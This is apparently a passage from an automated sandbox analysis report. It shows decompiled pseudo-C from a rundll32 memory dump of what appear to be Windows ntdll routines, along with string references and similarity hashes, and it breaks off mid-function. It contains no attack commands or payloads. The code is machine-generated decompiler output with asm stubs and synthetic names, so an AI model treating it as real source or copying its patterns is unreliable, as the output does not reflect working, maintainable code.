                                                                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                            						asm("int3");
                                                                                            						 *(_t41 - 4) = 0xfffffffe;
                                                                                            					}
                                                                                            				}
                                                                                            				 *(_t41 - 4) = 1;
                                                                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                            				 *((intOrPtr*)(_t41 - 0x64)) = L0462DEF0;
                                                                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                            				_push(_t41 - 0x70);
                                                                                            				L0462DEF0(1, _t38);
                                                                                            				 *(_t41 - 4) = 0xfffffffe;
                                                                                            				return E0462D130(_t34, _t39, _t40);
                                                                                            			}






                                                                                            Strings
                                                                                            • Critical error detected %lx, xrefs: 04688E21
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Critical error detected %lx
                                                                                            • API String ID: 0-802127002
                                                                                            • Opcode ID: 4796e974b8edd926ce9db4014e178bf2eececb8d5d633094a03664941e0fea21
                                                                                            • Instruction ID: b2ca3c64963d49acee2c2a4fc295c3ee0cbf64cb9dc4f8320032a7e7cbb38216
                                                                                            • Opcode Fuzzy Hash: 4796e974b8edd926ce9db4014e178bf2eececb8d5d633094a03664941e0fea21
                                                                                            • Instruction Fuzzy Hash: 76118B71D00748EBEF24EFA495097DDBBB0BB14314F20425ED469AB382E3346602CF18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0466FF60
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                            • API String ID: 0-1911121157
                                                                                            • Opcode ID: 9a9fc449ba5f79326b78e5363d7bec4d37b1e1105f8412fa8557d69174cb2dc2
                                                                                            • Instruction ID: 296b2020b876139e57f257974939071f71936c7eefd47d1d4592afab9f9f5b75
                                                                                            • Opcode Fuzzy Hash: 9a9fc449ba5f79326b78e5363d7bec4d37b1e1105f8412fa8557d69174cb2dc2
                                                                                            • Instruction Fuzzy Hash: 6B110071910584FFEB16EF50D949FA8BBB2FF08708F148448E10A6B6A1E739B980CF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 88%
                                                                                            			E046A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				signed int _t296;
                                                                                            				signed char _t298;
                                                                                            				signed int _t301;
                                                                                            				signed int _t306;
                                                                                            				signed int _t310;
                                                                                            				signed char _t311;
                                                                                            				intOrPtr _t312;
                                                                                            				signed int _t313;
                                                                                            				void* _t327;
                                                                                            				signed int _t328;
                                                                                            				intOrPtr _t329;
                                                                                            				intOrPtr _t333;
                                                                                            				signed char _t334;
                                                                                            				signed int _t336;
                                                                                            				void* _t339;
                                                                                            				signed int _t340;
                                                                                            				signed int _t356;
                                                                                            				signed int _t362;
                                                                                            				short _t367;
                                                                                            				short _t368;
                                                                                            				short _t373;
                                                                                            				signed int _t380;
                                                                                            				void* _t382;
                                                                                            				short _t385;
                                                                                            				signed short _t392;
                                                                                            				signed char _t393;
                                                                                            				signed int _t395;
                                                                                            				signed char _t397;
                                                                                            				signed int _t398;
                                                                                            				signed short _t402;
                                                                                            				void* _t406;
                                                                                            				signed int _t412;
                                                                                            				signed char _t414;
                                                                                            				signed short _t416;
                                                                                            				signed int _t421;
                                                                                            				signed char _t427;
                                                                                            				intOrPtr _t434;
                                                                                            				signed char _t435;
                                                                                            				signed int _t436;
                                                                                            				signed int _t442;
                                                                                            				signed int _t446;
                                                                                            				signed int _t447;
                                                                                            				signed int _t451;
                                                                                            				signed int _t453;
                                                                                            				signed int _t454;
                                                                                            				signed int _t455;
                                                                                            				intOrPtr _t456;
                                                                                            				intOrPtr* _t457;
                                                                                            				short _t458;
                                                                                            				signed short _t462;
                                                                                            				signed int _t469;
                                                                                            				intOrPtr* _t474;
                                                                                            				signed int _t475;
                                                                                            				signed int _t479;
                                                                                            				signed int _t480;
                                                                                            				signed int _t481;
                                                                                            				short _t485;
                                                                                            				signed int _t491;
                                                                                            				signed int* _t494;
                                                                                            				signed int _t498;
                                                                                            				signed int _t505;
                                                                                            				intOrPtr _t506;
                                                                                            				signed short _t508;
                                                                                            				signed int _t511;
                                                                                            				void* _t517;
                                                                                            				signed int _t519;
                                                                                            				signed int _t522;
                                                                                            				void* _t523;
                                                                                            				signed int _t524;
                                                                                            				void* _t528;
                                                                                            				signed int _t529;
                                                                                            
                                                                                            				_push(0xd4);
                                                                                            				_push(0x46b1178);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				_t494 = __edx;
                                                                                            				 *(_t528 - 0xcc) = __edx;
                                                                                            				_t511 = __ecx;
                                                                                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                            				 *(_t528 - 0xbc) = __ecx;
                                                                                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                            				_t427 = 0;
                                                                                            				 *(_t528 - 0x74) = 0;
                                                                                            				 *(_t528 - 0x9c) = 0;
                                                                                            				 *(_t528 - 0x84) = 0;
                                                                                            				 *(_t528 - 0xac) = 0;
                                                                                            				 *(_t528 - 0x88) = 0;
                                                                                            				 *(_t528 - 0xa8) = 0;
                                                                                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                            				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                            					if(__eflags != 0) {
                                                                                            						_t421 = E046A4C56(0, __edx, __ecx, __eflags);
                                                                                            						__eflags = _t421;
                                                                                            						if(_t421 != 0) {
                                                                                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                            							E0461D000(0x410);
                                                                                            							 *(_t528 - 0x18) = _t529;
                                                                                            							 *(_t528 - 0x9c) = _t529;
                                                                                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                            							E046A5542(_t528 - 0x9c, _t528 - 0x84);
                                                                                            						}
                                                                                            					}
                                                                                            					_t435 = _t427;
                                                                                            					 *(_t528 - 0xd0) = _t435;
                                                                                            					_t474 = _t511 + 0x65;
                                                                                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                            					_t511 = 0x18;
                                                                                            					while(1) {
                                                                                            						 *(_t528 - 0xa0) = _t427;
                                                                                            						 *(_t528 - 0xbc) = _t427;
                                                                                            						 *(_t528 - 0x80) = _t427;
                                                                                            						 *(_t528 - 0x78) = 0x50;
                                                                                            						 *(_t528 - 0x79) = _t427;
                                                                                            						 *(_t528 - 0x7a) = _t427;
                                                                                            						 *(_t528 - 0x8c) = _t427;
                                                                                            						 *(_t528 - 0x98) = _t427;
                                                                                            						 *(_t528 - 0x90) = _t427;
                                                                                            						 *(_t528 - 0xb0) = _t427;
                                                                                            						 *(_t528 - 0xb8) = _t427;
                                                                                            						_t296 = 1 << _t435;
                                                                                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                            						__eflags = _t436 & _t296;
                                                                                            						if((_t436 & _t296) != 0) {
                                                                                            							goto L92;
                                                                                            						}
                                                                                            						__eflags =  *((char*)(_t474 - 1));
                                                                                            						if( *((char*)(_t474 - 1)) == 0) {
                                                                                            							goto L92;
                                                                                            						}
                                                                                            						_t301 =  *_t474;
                                                                                            						__eflags = _t494[1] - _t301;
                                                                                            						if(_t494[1] <= _t301) {
                                                                                            							L10:
                                                                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                            								L12:
                                                                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                            									goto L92;
                                                                                            								}
                                                                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                            									goto L92;
                                                                                            								}
                                                                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                            									goto L92;
                                                                                            								}
                                                                                            								L15:
                                                                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                            								 *(_t528 - 0xc0) = _t306;
                                                                                            								 *(_t528 - 0xa4) = _t306;
                                                                                            								__eflags =  *0x46c60e8;
                                                                                            								if( *0x46c60e8 != 0) {
                                                                                            									__eflags = _t306 - 0x40;
                                                                                            									if(_t306 < 0x40) {
                                                                                            										L20:
                                                                                            										asm("lock inc dword [eax]");
                                                                                            										_t310 =  *0x46c60e8; // 0x0
                                                                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                            										__eflags = _t311 & 0x00000001;
                                                                                            										if((_t311 & 0x00000001) == 0) {
                                                                                            											 *(_t528 - 0xa0) = _t311;
                                                                                            											_t475 = _t427;
                                                                                            											 *(_t528 - 0x74) = _t427;
                                                                                            											__eflags = _t475;
                                                                                            											if(_t475 != 0) {
                                                                                            												L91:
                                                                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                            												goto L92;
                                                                                            											}
                                                                                            											asm("sbb edi, edi");
                                                                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                            											_t511 = _t498;
                                                                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                            											__eflags =  *(_t312 - 5) & 1;
                                                                                            											if(( *(_t312 - 5) & 1) != 0) {
                                                                                            												_push(_t528 - 0x98);
                                                                                            												_push(0x4c);
                                                                                            												_push(_t528 - 0x70);
                                                                                            												_push(1);
                                                                                            												_push(0xfffffffa);
                                                                                            												_t412 = E04619710();
                                                                                            												_t475 = _t427;
                                                                                            												__eflags = _t412;
                                                                                            												if(_t412 >= 0) {
                                                                                            													_t414 =  *(_t528 - 0x98) - 8;
                                                                                            													 *(_t528 - 0x98) = _t414;
                                                                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                            													 *(_t528 - 0x8c) = _t416;
                                                                                            													 *(_t528 - 0x79) = 1;
                                                                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                            													__eflags = _t511;
                                                                                            												}
                                                                                            											}
                                                                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                            											__eflags = _t446 & 0x00000004;
                                                                                            											if((_t446 & 0x00000004) != 0) {
                                                                                            												__eflags =  *(_t528 - 0x9c);
                                                                                            												if( *(_t528 - 0x9c) != 0) {
                                                                                            													 *(_t528 - 0x7a) = 1;
                                                                                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                            													__eflags = _t511;
                                                                                            												}
                                                                                            											}
                                                                                            											_t313 = 2;
                                                                                            											_t447 = _t446 & _t313;
                                                                                            											__eflags = _t447;
                                                                                            											 *(_t528 - 0xd4) = _t447;
                                                                                            											if(_t447 != 0) {
                                                                                            												_t406 = 0x10;
                                                                                            												_t511 = _t511 + _t406;
                                                                                            												__eflags = _t511;
                                                                                            											}
                                                                                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                            											 *(_t528 - 0x88) = _t427;
                                                                                            											__eflags =  *(_t528 + 0x1c);
                                                                                            											if( *(_t528 + 0x1c) <= 0) {
                                                                                            												L45:
                                                                                            												__eflags =  *(_t528 - 0xb0);
                                                                                            												if( *(_t528 - 0xb0) != 0) {
                                                                                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                            													__eflags = _t511;
                                                                                            												}
                                                                                            												__eflags = _t475;
                                                                                            												if(_t475 != 0) {
                                                                                            													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                            													goto L100;
                                                                                            												} else {
                                                                                            													_t494[3] = _t511;
                                                                                            													_t451 =  *(_t528 - 0xa0);
                                                                                            													_t427 = E04616DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                            													 *(_t528 - 0x88) = _t427;
                                                                                            													__eflags = _t427;
                                                                                            													if(_t427 == 0) {
                                                                                            														__eflags = _t511 - 0xfff8;
                                                                                            														if(_t511 <= 0xfff8) {
                                                                                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                            															asm("sbb ecx, ecx");
                                                                                            															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                            														}
                                                                                            														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                            														L100:
                                                                                            														goto L101;
                                                                                            													}
                                                                                            													_t453 =  *(_t528 - 0xa0);
                                                                                            													 *_t494 = _t453;
                                                                                            													_t494[1] = _t427;
                                                                                            													_t494[2] =  *(_t528 - 0xbc);
                                                                                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													__eflags =  *(_t528 + 0x14);
                                                                                            													if( *(_t528 + 0x14) == 0) {
                                                                                            														__eflags =  *[fs:0x18] + 0xf50;
                                                                                            													}
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													asm("movsd");
                                                                                            													__eflags =  *(_t528 + 0x18);
                                                                                            													if( *(_t528 + 0x18) == 0) {
                                                                                            														_t454 =  *(_t528 - 0x80);
                                                                                            														_t479 =  *(_t528 - 0x78);
                                                                                            														_t327 = 1;
                                                                                            														__eflags = 1;
                                                                                            													} else {
                                                                                            														_t146 = _t427 + 0x50; // 0x50
                                                                                            														_t454 = _t146;
                                                                                            														 *(_t528 - 0x80) = _t454;
                                                                                            														_t382 = 0x18;
                                                                                            														 *_t454 = _t382;
                                                                                            														 *((short*)(_t454 + 2)) = 1;
                                                                                            														_t385 = 0x10;
                                                                                            														 *((short*)(_t454 + 6)) = _t385;
                                                                                            														 *(_t454 + 4) = 0;
                                                                                            														asm("movsd");
                                                                                            														asm("movsd");
                                                                                            														asm("movsd");
                                                                                            														asm("movsd");
                                                                                            														_t327 = 1;
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t479 = 0x68;
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            													}
                                                                                            													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                            													if( *(_t528 - 0x79) == _t327) {
                                                                                            														_t524 = _t479 + _t427;
                                                                                            														_t508 =  *(_t528 - 0x8c);
                                                                                            														 *_t524 = _t508;
                                                                                            														_t373 = 2;
                                                                                            														 *((short*)(_t524 + 2)) = _t373;
                                                                                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                            														 *((short*)(_t524 + 4)) = 0;
                                                                                            														_t167 = _t524 + 8; // 0x8
                                                                                            														E0461F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                            														_t529 = _t529 + 0xc;
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            														_t380 =  *(_t528 - 0x80);
                                                                                            														__eflags = _t380;
                                                                                            														if(_t380 != 0) {
                                                                                            															_t173 = _t380 + 4;
                                                                                            															 *_t173 =  *(_t380 + 4) | 1;
                                                                                            															__eflags =  *_t173;
                                                                                            														}
                                                                                            														_t454 = _t524;
                                                                                            														 *(_t528 - 0x80) = _t454;
                                                                                            														_t327 = 1;
                                                                                            														__eflags = 1;
                                                                                            													}
                                                                                            													__eflags =  *(_t528 - 0xd4);
                                                                                            													if( *(_t528 - 0xd4) == 0) {
                                                                                            														_t505 =  *(_t528 - 0x80);
                                                                                            													} else {
                                                                                            														_t505 = _t479 + _t427;
                                                                                            														_t523 = 0x10;
                                                                                            														 *_t505 = _t523;
                                                                                            														_t367 = 3;
                                                                                            														 *((short*)(_t505 + 2)) = _t367;
                                                                                            														_t368 = 4;
                                                                                            														 *((short*)(_t505 + 6)) = _t368;
                                                                                            														 *(_t505 + 4) = 0;
                                                                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                            														_t327 = 1;
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t479 = _t479 + _t523;
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            														__eflags = _t454;
                                                                                            														if(_t454 != 0) {
                                                                                            															_t186 = _t454 + 4;
                                                                                            															 *_t186 =  *(_t454 + 4) | 1;
                                                                                            															__eflags =  *_t186;
                                                                                            														}
                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                            													}
                                                                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                            													if( *(_t528 - 0x7a) == _t327) {
                                                                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                            														E0461F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                            														_t529 = _t529 + 0xc;
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            														__eflags = _t505;
                                                                                            														if(_t505 != 0) {
                                                                                            															_t199 = _t505 + 4;
                                                                                            															 *_t199 =  *(_t505 + 4) | 1;
                                                                                            															__eflags =  *_t199;
                                                                                            														}
                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                            														 *(_t528 - 0x80) = _t505;
                                                                                            													}
                                                                                            													__eflags =  *(_t528 - 0xa8);
                                                                                            													if( *(_t528 - 0xa8) != 0) {
                                                                                            														_t356 = _t479 + _t427;
                                                                                            														 *(_t528 - 0xd4) = _t356;
                                                                                            														_t462 =  *(_t528 - 0xac);
                                                                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                            														_t485 = 0xc;
                                                                                            														 *((short*)(_t356 + 2)) = _t485;
                                                                                            														 *(_t356 + 6) = _t462;
                                                                                            														 *((short*)(_t356 + 4)) = 0;
                                                                                            														_t211 = _t356 + 8; // 0x9
                                                                                            														E0461F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                            														E0461FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                            														_t529 = _t529 + 0x18;
                                                                                            														_t427 =  *(_t528 - 0x88);
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t505 =  *(_t528 - 0xd4);
                                                                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            														_t362 =  *(_t528 - 0x80);
                                                                                            														__eflags = _t362;
                                                                                            														if(_t362 != 0) {
                                                                                            															_t222 = _t362 + 4;
                                                                                            															 *_t222 =  *(_t362 + 4) | 1;
                                                                                            															__eflags =  *_t222;
                                                                                            														}
                                                                                            													}
                                                                                            													__eflags =  *(_t528 - 0xb0);
                                                                                            													if( *(_t528 - 0xb0) != 0) {
                                                                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                            														_t458 = 0xb;
                                                                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                            														E0461FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                            														_t529 = _t529 + 0xc;
                                                                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                            														 *(_t528 - 0x78) = _t479;
                                                                                            														__eflags = _t505;
                                                                                            														if(_t505 != 0) {
                                                                                            															_t241 = _t505 + 4;
                                                                                            															 *_t241 =  *(_t505 + 4) | 1;
                                                                                            															__eflags =  *_t241;
                                                                                            														}
                                                                                            													}
                                                                                            													_t328 =  *(_t528 + 0x1c);
                                                                                            													__eflags = _t328;
                                                                                            													if(_t328 == 0) {
                                                                                            														L87:
                                                                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                            														_t455 =  *(_t528 - 0xdc);
                                                                                            														 *(_t427 + 0x14) = _t455;
                                                                                            														_t480 =  *(_t528 - 0xa0);
                                                                                            														_t517 = 3;
                                                                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                            															asm("rdtsc");
                                                                                            															 *(_t427 + 0x3c) = _t480;
                                                                                            														} else {
                                                                                            															 *(_t427 + 0x3c) = _t455;
                                                                                            														}
                                                                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                            														_t456 =  *[fs:0x18];
                                                                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                            														_t427 = 0;
                                                                                            														__eflags = 0;
                                                                                            														_t511 = 0x18;
                                                                                            														goto L91;
                                                                                            													} else {
                                                                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                            														__eflags = _t519;
                                                                                            														 *(_t528 - 0x8c) = _t328;
                                                                                            														do {
                                                                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                            																_t334 =  *_t519;
                                                                                            															} else {
                                                                                            																_t334 = 0;
                                                                                            															}
                                                                                            															_t336 = _t334 & 0x000000ff;
                                                                                            															__eflags = _t336;
                                                                                            															_t427 =  *(_t528 - 0x88);
                                                                                            															if(_t336 == 0) {
                                                                                            																_t481 = _t479 + _t506;
                                                                                            																__eflags = _t481;
                                                                                            																 *(_t528 - 0x78) = _t481;
                                                                                            																E0461F3E0(_t479 + _t427, _t457, _t506);
                                                                                            																_t529 = _t529 + 0xc;
                                                                                            															} else {
                                                                                            																_t340 = _t336 - 1;
                                                                                            																__eflags = _t340;
                                                                                            																if(_t340 == 0) {
                                                                                            																	E0461F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                            																	_t529 = _t529 + 0xc;
                                                                                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                            																} else {
                                                                                            																	__eflags = _t340 == 0;
                                                                                            																	if(_t340 == 0) {
                                                                                            																		__eflags = _t506 - 8;
                                                                                            																		if(_t506 == 8) {
                                                                                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                            																		}
                                                                                            																	}
                                                                                            																}
                                                                                            															}
                                                                                            															_t339 = 0x10;
                                                                                            															_t519 = _t519 + _t339;
                                                                                            															_t263 = _t528 - 0x8c;
                                                                                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                            															__eflags =  *_t263;
                                                                                            															_t479 =  *(_t528 - 0x78);
                                                                                            														} while ( *_t263 != 0);
                                                                                            														goto L87;
                                                                                            													}
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                            												 *(_t528 - 0xa2) = _t392;
                                                                                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                            												__eflags = _t469;
                                                                                            												while(1) {
                                                                                            													 *(_t528 - 0xe4) = _t511;
                                                                                            													__eflags = _t392;
                                                                                            													_t393 = _t427;
                                                                                            													if(_t392 != 0) {
                                                                                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                            													}
                                                                                            													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                            													__eflags = _t395;
                                                                                            													if(_t395 == 0) {
                                                                                            														_t511 = _t511 +  *_t469;
                                                                                            														__eflags = _t511;
                                                                                            													} else {
                                                                                            														_t398 = _t395 - 1;
                                                                                            														__eflags = _t398;
                                                                                            														if(_t398 == 0) {
                                                                                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                            														} else {
                                                                                            															__eflags = _t398 == 1;
                                                                                            															if(_t398 == 1) {
                                                                                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                            																_t402 =  *_t469 & 0x0000ffff;
                                                                                            																 *(_t528 - 0xac) = _t402;
                                                                                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                            													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                            														break;
                                                                                            													}
                                                                                            													_t397 =  *(_t528 - 0x88) + 1;
                                                                                            													 *(_t528 - 0x88) = _t397;
                                                                                            													_t469 = _t469 + 0x10;
                                                                                            													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                            													_t392 =  *(_t528 - 0xa2);
                                                                                            													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                            														continue;
                                                                                            													}
                                                                                            													goto L45;
                                                                                            												}
                                                                                            												_t475 = 0x216;
                                                                                            												 *(_t528 - 0x74) = 0x216;
                                                                                            												goto L45;
                                                                                            											}
                                                                                            										} else {
                                                                                            											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                            											goto L16;
                                                                                            										}
                                                                                            									}
                                                                                            									_t491 = E046A4CAB(_t306, _t528 - 0xa4);
                                                                                            									 *(_t528 - 0x74) = _t491;
                                                                                            									__eflags = _t491;
                                                                                            									if(_t491 != 0) {
                                                                                            										goto L91;
                                                                                            									} else {
                                                                                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                            										goto L20;
                                                                                            									}
                                                                                            								}
                                                                                            								L16:
                                                                                            								 *(_t528 - 0x74) = 0x1069;
                                                                                            								L93:
                                                                                            								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                            								 *(_t528 - 0xd0) = _t298;
                                                                                            								_t474 = _t474 + _t511;
                                                                                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                            								_t494 = 4;
                                                                                            								__eflags = _t298 - _t494;
                                                                                            								if(_t298 >= _t494) {
                                                                                            									goto L100;
                                                                                            								}
                                                                                            								_t494 =  *(_t528 - 0xcc);
                                                                                            								_t435 = _t298;
